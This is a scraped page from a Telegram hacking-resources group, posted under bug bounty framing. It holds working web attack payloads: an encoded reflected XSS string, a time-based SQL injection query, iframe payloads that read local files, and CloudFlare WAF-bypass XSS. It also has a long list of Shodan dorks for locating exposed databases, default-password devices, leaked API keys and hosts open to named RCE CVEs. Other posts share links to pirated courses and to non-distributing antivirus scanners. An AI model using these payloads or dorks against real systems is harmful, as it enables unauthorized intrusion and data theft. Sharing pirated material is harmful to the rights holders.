Termux All Command [Telegram Group]
Open in Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Show more1 184
Subscribers
No data24 hours
+147 days
+4730 days
Posts Archive
"Best Recon methodology (Shubham Rooter)" by Shubham Tiwari! ๐ฅ
Read More: https://shubhamrooter.medium.com/best-recon-methodology-shubham-rooter-dcdca8d4caa4
Bug Bounty Hunting Search Engine! ๐ฅ
Check Here: https://www.bugbountyhunting.com
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#bugbountytips #BugBounty #payload
Course name : Recon for Ethical Hacking / Penetration Testing & Bug Bounty
Udemy Link : https://www.udemy.com/course/recon-for-bug-bounty-pentesting-ethicalhacking-by-shifa-rohit-hacktify/
Crack Link : https://www.youtube.com/@reconforpenetrationtesting3157/videos
Course Name: Bug Bounty AZ: Ethical Hacking + Cyber โโSecurity Course
๐ Course Details: Udemy
๐ค โโDirect Download Linkโฌ๏ธ
โก๏ธ https://teraboxapp.com/s/1tLjIiHiTKTdSaOS2u3PXiQ
โ๐ฐโโ๐ฐโโCourse Name: Web Development (PHP) Full Course
๐ค โโDirect Download Linkโฌ๏ธ
โก๏ธ https://teraboxapp.com/s/1ecnxXWv9MmiPY8ldB6Q06Q
๐น
๐ฐ Course Name : Full Stack Web Development in MERN Stack (Beginner to Advanced)
๐ค โโDirect Download Linkโฌ๏ธ
โก๏ธ https://teraboxapp.com/s/1VhkZgMnibgrXTullE0Skgw
๐ You can share our channel with your friends.
โ๐ฐโโCourse Name: Web Development with PHP LARAVEL
โ
OWNER: HASIN HAYDER
๐ค โโDirect Download Linkโฌ๏ธ
โก https://teraboxapp.com/s/1KC76SZ2YB20TU9aTK6K9Hw
๐๐Shodan-Dork๐๐
๐ Prodect mysql found
๐product:MySQL
๐ MongoDB
๐"MongoDB Server Information" -authentication
๐ defult password
๐"default password"
๐ guest login
๐ guest login ok
๐ Jenkins Unrestricted Dashboard
๐x-jenkins 200
๐ wp config
๐http.html:"* The wp-config.php creation script uses this file"
๐ root session
๐"root@" port:23 -login -password -name -Session
๐ defult wireless password
๐html:"def_wirelesspassword"
๐ Auth desabled
๐"authentication disabled"
๐ dashboard
๐http.title:"dashboard"
๐ control panel
๐http.title:"control panel"
๐ phpmyadmin
๐http.title:"phpmyadmin"
๐ CouchDB
๐product:"CouchDB"
๐ kibana
๐kibana content-length:217
๐ CVE-2021-26855-CVE-2021-31206 Microsoft RCE
๐http.title:outlook exchange
๐ CVE-2022-29464 WSO2 RCE
๐http.favicon.hash:1398055326
๐ CVE-2022-29464.WSO2 RCE
๐http.html:WSO2
๐ Cisco ASA CVE-2020-3452
๐"webvpn="
๐ Windows SMB exposures
๐port:"445" os:"Windows"
๐ CVE-2022-22954 in VMWare Workspace ONE
๐http.favicon.hash:-1250474341
๐ Find secret API keys publicly exposed #2
๐http.html:"xoxb-"
๐ Find all jenkins server
๐http.favicon.hash:81586312
๐ Find all grafana dashboards
๐http.title:"Grafana"
๐ CVE-2022-24255 Main & Admin Portals: Authentication Bypass
๐http.html:zabbix
๐ Horde webmail A takeover
๐http.html:Horde:
๐ CVE-2022-24348:path traversal
๐http.title:"Argo CD"
๐ tomcat may log4j
๐product:tomcat
๐ NO password required for telnet
๐port:23 console gateway
๐ Windows RDP Password:
๐"๏ฟฝ๏ฟฝร๏ฟฝ๏ฟฝ4๏ฟฝ"proftpd port:21
๐ proftpd port:21
๐proftpd port:21
๐ "authentication disabled" "RFB 003.008"
๐"authentication disabled" "RFB 003.008"
๐ CVE CVE-2019-11510
๐http.html:/dana-na/
๐ F5 BIG-IP using CVE-2020-5902
๐http.title:"BIG-IP
๐ unauthorized
๐"unauthorized"
๐ Mongo Express Web GUI
๐"Set-Cookie: mongo-express=" "200 OK"
๐ Jenkins CI
๐"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
๐ Intel Active Management CVE-2017-5689
๐"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
๐ Apache Directory Listings
๐http.title:"Index of /" http.html:".pem"
Bug bounty tips And tricks โจ๏ธ
โญ๐๐๐ ๐ญ๐จ ๐๐๐๐
(๐๐๐ญ๐ก๐จ๐ ๐)โญ
* Note this only works if proper sanitization is not performed and the server processes the payload server-side *
Input the following code in the vulnerable field:
You can also read local files:
๐ฐOnline Antivirus Websites to Scan the file for Viruses
๐ฅAntiviruses:
โช๏ธ http://fuckingscan.me/
โช๏ธ http://v2.scan.majyx.net/
โช๏ธ http://nodistribute.com/
โช๏ธ http://www.file2scan.net/
โช๏ธ thestarkarmyx.t.me
โช๏ธ http://anubis.iseclab.org/
โช๏ธ https://anonscanner.com/
โช๏ธ http://virusscan.jotti.org/it
โช๏ธ www.virustotal.com/nl/
Practical Ethical Hacking - The Complete Course Part 01.zip3985.01 MB
Try this payload for the XSS and bypassing WAF ๐
Payload:
Last month I discovered more than 9 vulnerabilities on 1 government website, and 6 of them were Git Repository Exposure vulnerabilities, and 1 SQL injection vulnerability
sql Injection Query : 'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
tip: always check the .git directory
#bughunter
#tips
Bug bounty tips And tricks โจ๏ธ
Collection of Notes, Checklists, Writeups on Bug Bounty Hunting and Web Application Security.
https://lnkd.in/gpusBhbx
โญ๐๐๐ ๐ญ๐จ ๐๐๐๐
(๐๐๐ญ๐ก๐จ๐ ๐)โญ Input the following code in the vulnerable field: <iframe src="http://localhost/some/directory"></iframe> You can also read local files: <iframe src="file:///C:/Windows/win.ini" width="500" height="500"> This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required. #owasp #cybersecurity #redteam
Exploit Notes๐ง๐ปโ๐ป - An easy search tool that finds hacking tools, commands, and cheat sheets. It helps with cybersecurity learning and training, CTFs, bug bounty, ethical hacking, etc.
โบโบ https://lnkd.in/dHtn-ery
One more CloudFlare XSS bypass payload ๐ ๐ฅ
Encoded Payload
"><track/onerror='confirm\%601\%60'>
Clean Payload
"><track/onerror='confirm`1`'>
Available now! Telegram Research 2025 โ the year's key insights 
